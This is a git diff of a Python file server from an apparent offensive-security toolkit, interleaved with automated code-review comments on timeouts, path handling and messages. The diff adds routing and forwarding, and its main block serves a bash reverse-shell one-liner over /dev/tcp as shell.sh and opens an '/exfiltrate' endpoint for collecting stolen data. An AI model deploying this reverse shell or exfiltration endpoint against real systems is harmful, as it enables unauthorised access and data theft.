diff --git a/fileserver.py b/fileserver.py index 57850cc..59bd5fc 100755 --- a/fileserver.py +++ b/fileserver.py @@ -3,6 +3,7 @@ from hackingscripts import util from http.server import BaseHTTPRequestHandler, HTTPServer import threading +import requests import sys import os import ssl @@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler): def do_POST(self): self.do_GET() + def onForward(self, target): + queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:] + if queryStr: + target += "?" if "?" not in target else "&" + target += queryStr + + method = self.command + res = requests.request(method, target) + return res.content, res.status_code + def do_GET(self): - path = self.path if "?" not in self.path else self.path[0:self.path.find("?")] - if path in self.server.files: - data = self.server.files[path] - self.send_response(200) + + path = self.server.cleanPath(self.path) + if path in self.server.routes: + data, code = self.server.routes[path](self) + self.send_response(code) self.end_headers() - self.wfile.write(data) + + if data: + self.wfile.write(data) else: self.send_response(404) self.end_headers() 
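Review bot: `onForward` calls `requests.request(method, target)` with no timeout and no error handling, so an upstream that stalls or refuses the connection hangs or crashes the handler. Because `HttpFileServer` derives from the single-threaded `HTTPServer`, one hung forward holds up every other client. Pass an explicit timeout, e.g. `res = requests.request(method, target, timeout=10)`, and catch `requests.RequestException` to answer with an empty body and status 502 rather than letting the traceback escape. The forward also carries only the method and query string: the body and headers of a POST (routed through `do_GET`) are not relayed and upstream response headers such as `Content-Type` are dropped, which deserves a comment on `onForward` if it is intentional. `do_GET` continues past the end of this hunk.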
@@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler): def log_message(self, format, *args): if self.server.logRequests: - # BaseHTTPRequestHandler.log_message(format, *args) super().log_message(format, *args) class HttpFileServer(HTTPServer): def __init__(self, addr, port): super().__init__((addr, port), FileServerRequestHandler) self.logRequests = False + self.routes = { } self.dumpRequests = [] - self.files = { } + + def cleanPath(self, path): + + if "?" in path: + path = path[0:path.find("?")] + + if not path.startswith("/"): + path = "/" + path + + return path.strip() def addFile(self, name, data): if isinstance(data, str): data = data.encode("UTF-8") - if not name.startswith("/"): - name = "/" + name - self.files[name.strip()] = data - def addFile(self, name, data): - if isinstance(data, str): - data = data.encode("UTF-8") - if not name.startswith("/"): - name = "/" + name - self.files[name.strip()] = data + # return 200 - OK and data + self.addRoute(name, lambda req: (data, 200)) def dumpRequest(self, name): - if not name.startswith("/"): - name = "/" + name - self.dumpRequests.append(name) + self.dumpRequests.append(self.cleanPath(name)) + + def addRoute(self, path, func): + self.routes[self.cleanPath(path)] = func + + def forwardRequest(self, path, target): + self.addRoute(path, lambda req: req.onForward(target)) def enableLogging(self): self.logRequests = True 
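Review bot: `cleanPath` adds the leading `/` before it strips whitespace, so a name registered as `" shell.sh"` (constructed example) becomes the key `/ shell.sh` and never matches a request path. Strip first, with `path = path.strip()` ahead of the `startswith("/")` check, then `return path`. The helper now normalises both operator-supplied route names and the client-supplied `self.path`, so a short docstring stating what it does (query string removed, leading slash enforced, no percent-decoding) would make the exact-match lookup in `routes` easier to reason about. Replacing `self.files` with `self.routes` also removes a public attribute; any caller outside this diff that reads `server.files` would break, which cannot be checked from here.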
@@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer): t.start() return t -# EXAMPLE + def start(self): + return self.serve_forever() + if __name__ == "__main__": - listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1]) + if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]: + print("Usage: %s [shell,dump,proxy]" % sys.argv[0]) + exit(1) + + fileServer = HttpFileServer("0.0.0.0", 80) ipAddress = util.getAddress() - rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort) - fileServer = HttpFileServer("0.0.0.0", 80) - fileServer.addFile("shell.sh", rev_shell) - fileServer.startBackground() - print("Reverse Shell URL: http://%s/shell.sh" % ipAddress) + if sys.argv[1] == "shell": + listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2]) + rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort) + fileServer.addFile("shell.sh", rev_shell) + print("Reverse Shell URL: http://%s/shell.sh" % ipAddress) + elif sys.argv[1] == "dump": + fileServer.dumpRequest("/exfiltrate") + print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress) + elif sys.argv[1] == "proxy": + fileServer.forwardRequest("/proxy", "https://google.com") + print("Exfiltrate data using: http://%s/proxy" % ipAddress) + + fileServer.start() diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh old mode 100644 new mode 100755
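Review bot: The `proxy` branch prints the `dump` branch's message, `"Exfiltrate data using: http://%s/proxy"`, although the route it registers forwards requests to `https://google.com`; give it its own text, e.g. `print("Forwarding requests from: http://%s/proxy" % ipAddress)`. The usage check calls the `site`-provided `exit(1)`; `sys` is already imported, so `sys.exit(1)` is the dependable form. Every mode binds `0.0.0.0:80`, so the forwarder and the dump endpoint are reachable from any interface of the host; taking the bind address as an argument would let the operator restrict it. `int(sys.argv[2])` is also unchecked, so a non-numeric port ends in a bare `ValueError` traceback.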